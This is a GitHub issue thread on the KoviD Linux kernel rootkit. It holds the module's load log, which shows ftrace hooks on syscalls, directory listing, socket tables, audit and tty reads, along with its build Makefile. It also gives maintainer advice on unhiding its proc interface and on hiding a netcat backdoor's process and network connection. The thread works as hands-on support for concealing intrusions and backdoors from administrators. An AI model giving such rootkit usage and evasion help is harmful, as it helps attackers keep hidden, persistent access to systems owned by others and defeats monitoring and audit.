Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Can't find /proc/mytest: No such file or directory #89

Closed
homelanmder opened this issue May 3, 2024 · 10 comments
Closed

Can't find /proc/mytest: No such file or directory #89

homelanmder opened this issue May 3, 2024 · 10 comments

Comments

@homelanmder
Copy link

this dmesg info:

[  256.042347] kv: using kprobe for kallsyms_lookup_name
[  256.052423] add sysaddr: ffffffff980b4030
[  256.052597] addname '.MXOJKP' ro=1
[  256.052732] new var, filename: '/var/.MXOJKP'
[  256.052902] Installing: 'sys_exit_group' syscall=1
[  256.062506] add sysaddr: ffffffff980a0170
[  256.106895] Installing: 'sys_clone' syscall=1
[  256.115699] add sysaddr: ffffffff980995a0
[  256.156970] Installing: 'sys_kill' syscall=1
[  256.166147] add sysaddr: ffffffff980ae730
[  256.168169] Installing: 'sys_bpf' syscall=1
[  256.178191] add sysaddr: ffffffff981ea760
[  256.295948] Installing: 'tcp4_seq_show' syscall=0
[  256.309552] Installing: 'udp4_seq_show' syscall=0
[  256.505231] Installing: 'tcp6_seq_show' syscall=0
[  256.537411] Installing: 'udp6_seq_show' syscall=0
[  256.541783] Installing: 'packet_rcv' syscall=0
[  256.644986] Installing: 'tpacket_rcv' syscall=0
[  256.774042] Installing: 'account_process_tick' syscall=0
[  256.784509] Installing: 'account_system_time' syscall=0
[  256.802086] Installing: 'audit_log_start' syscall=0
[  256.803673] Installing: 'filldir' syscall=0
[  256.913526] Installing: 'filldir64' syscall=0
[  256.927847] Installing: 'tty_read' syscall=0
[  256.981396] ftrace hook 0 on sys_exit_group
[  256.981576] ftrace hook 1 on sys_clone
[  256.981726] ftrace hook 2 on sys_kill
[  256.981873] ftrace hook 3 on sys_bpf
[  256.982017] ftrace hook 4 on tcp4_seq_show
[  256.982178] ftrace hook 5 on udp4_seq_show
[  256.982339] ftrace hook 6 on tcp6_seq_show
[  256.982501] ftrace hook 7 on udp6_seq_show
[  256.982662] ftrace hook 8 on packet_rcv
[  256.982814] ftrace hook 9 on tpacket_rcv
[  256.982969] ftrace hook 10 on account_process_tick
[  256.983155] ftrace hook 11 on account_system_time
[  256.983420] ftrace hook 12 on audit_log_start
[  256.983593] ftrace hook 13 on filldir
[  256.983739] ftrace hook 14 on filldir64
[  256.983891] ftrace hook 15 on tty_read
[  256.985749] Waiting for event
[  256.990317] hide [000000004489c775] irq/102_pciehp : 8049
[  256.990684] hide [00000000639fa20d] irq/101_pciehp : 8048
[  256.990914] hide [00000000c6a81ef0] irq/100_pciehp : 8047
[  256.991212] addname '.kovid' ro=1
[  256.991357] addname 'kovid' ro=1
[  256.991582] addname '.kv.ko' ro=1
[  256.991822] addname '.lm.sh' ro=1
[  256.991971] addname '.sshd_orig' ro=1
[  256.992117] addname 'whitenose' ro=1
[  256.992261] addname 'pinknose' ro=1
[  256.992401] addname 'rednose' ro=1
[  256.992540] addname 'blacknose' ro=1
[  256.992683] addname 'greynose' ro=1
[  256.992824] addname 'purplenose' ro=1
[  256.992970] addname 'bluenose' ro=1
[  256.993144] kovid loaded.

and this Makefile

OBJNAME=kovid

# turn off ring buffer debug:
# $ DEPLOY=1 make
ifndef DEPLOY
DEBUG_PR := -DDEBUG_RING_BUFFER
endif

LD=$(shell which ld)
AS=$(shell which as)
CTAGS=$(shell which ctags))
# PROCNAME, /proc/<name> interface. You must change it.
COMPILER_OPTIONS := -Wall -DPROCNAME='"mytest"' \
        -DMODNAME='"kovid"' -DKSOCKET_EMBEDDED ${DEBUG_PR} -DCPUHACK -DPRCTIMEOUT=1200

EXTRA_CFLAGS := -I$(src)/src -I$(src)/fs ${COMPILER_OPTIONS}

SRC := src/${OBJNAME}.c src/pid.c src/fs.c src/sys.c \
        src/sock.c src/util.c src/vm.c

persist=src/persist

$(OBJNAME)-objs = $(SRC:.c=.o)

obj-m := ${OBJNAME}.o

CC=gcc

all: persist
        make  -C  /lib/modules/$(shell uname -r)/build M=$(PWD) modules

persist:
        $(AS) --64 $(persist).S -statistics -fatal-warnings \
                -size-check=error -o $(persist).o
        $(LD) -Ttext 200000 --oformat binary -o $(persist) $(persist).o

lgtm: persist
        make  -C  /lib/modules/$(shell dpkg --status linux-headers-generic |grep ^Depends| \
                cut -d ":" -f2| sed 's/ linux-headers-//g')/build M=$(PWD) modules

clean:
        @make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
        @rm -f *.o src/*.o $(persist)
        @echo "Clean."

tags:
        $(CTAGS) -RV src/.

.PHONY: all clean tags

and my os info is that:
Linux amazon 5.10.215-203.850.amzn2.x86_64 #1 SMP Tue Apr 23 20:32:19 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

@carloslack
Copy link
Owner

The proc interface is hidden by default, when you insmod.
Unhide it with kill

@homelanmder
Copy link
Author

very thx.and i have another question,how can i hide tcp connection?i can understand the gif ,maybe i need to edit the source code?

@carloslack
Copy link
Owner

carloslack commented May 3, 2024

Backdoors included in kv have their traffic hidden along the processes, no need to change the code for that, but you can create a PR for it or something else

@homelanmder
Copy link
Author

i hide a process,but network connection is still unhide

[root@amazon ~]# netstat -anptl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      6735/rpcbind
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      7181/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      7138/master
tcp        0      0 192.168.7.144:22        192.168.7.1:53479       ESTABLISHED 24243/sshd: root@pt
tcp        0     36 192.168.7.144:22        192.168.7.1:52758       ESTABLISHED 21713/sshd: root@pt
tcp        0      0 192.168.7.144:8888      192.168.7.1:54475       ESTABLISHED 26267/nc
tcp6       0      0 :::111                  :::*                    LISTEN      6735/rpcbind
tcp6       0      0 :::22                   :::*                    LISTEN      7181/sshd
[root@amazon ~]# echo 26267 > /proc/netinfo
[root@amazon ~]# netstat -anptl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      6735/rpcbind
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      7181/sshd
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      7138/master
tcp        0      0 192.168.7.144:22        192.168.7.1:53479       ESTABLISHED 24243/sshd: root@pt
tcp        0     36 192.168.7.144:22        192.168.7.1:52758       ESTABLISHED 21713/sshd: root@pt
tcp        0      0 192.168.7.144:8888      192.168.7.1:54475       ESTABLISHED -
tcp6       0      0 :::111                  :::*                    LISTEN      6735/rpcbind
tcp6       0      0 :::22                   :::*                    LISTEN      7181/sshd

i really want to create pr,but i can't code with c

@carloslack
Copy link
Owner

Currently if you use bdclient.sh you'll have connections hidden, without having to change anything. If, for instance, you run, let's say nc and then use kv to hide it, you'll have the process hidden, like any other task, this way they are assumed as non-networking tasks.

@homelanmder
Copy link
Author

i understand,thx very much

@carloslack carloslack added enhancement New feature or request and removed enhancement New feature or request labels May 3, 2024
@carloslack
Copy link
Owner

No worries, I may soon change code to consider certain processes networking type

@homelanmder
Copy link
Author

i'm really expected,bro

@carloslack
Copy link
Owner

@homelanmder have a look #90 test it if works for you

@carloslack
Copy link
Owner

Closed by af60d88

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants